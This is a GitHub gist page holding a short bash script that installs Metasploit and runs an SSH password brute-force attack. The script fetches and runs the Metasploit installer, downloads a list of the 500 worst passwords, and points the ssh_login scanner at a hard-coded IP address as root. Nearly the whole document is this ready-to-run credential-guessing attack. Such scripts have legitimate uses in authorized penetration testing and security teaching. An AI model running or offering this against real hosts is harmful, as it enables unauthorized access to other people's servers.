Skip to content

Instantly share code, notes, and snippets.

@Resistor52
Created December 13, 2020 21:42
Show Gist options
  • Star 0 You must be signed in to star a gist
  • Fork 0 You must be signed in to fork a gist
  • Save Resistor52/36c098b4275eb05a129b426c4c6dde7a to your computer and use it in GitHub Desktop.
Save Resistor52/36c098b4275eb05a129b426c4c6dde7a to your computer and use it in GitHub Desktop.
Quick SSH Brute Force with Metasploit on Ubuntu
#!/bin/bash
# https://docs.rapid7.com/metasploit/installing-the-metasploit-framework/
# TODO Run as Root Check
apt-get update
curl https://raw.githubusercontent.com/rapid7/metasploit-omnibus/master/config/templates/metasploit-framework-wrappers/msfupdate.erb > msfinstall && chmod 755 msfinstall && ./msfinstall
cd ~
wget https://raw.githubusercontent.com/danielmiessler/SecLists/master/Passwords/Common-Credentials/500-worst-passwords.txt
msfconsole
use auxiliary/scanner/ssh/ssh_login
set RHOSTS 40.114.110.97
set USERNAME root
set USERPASS_FILE 500-worst-passwords.txt
set VERBOSE true
run
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment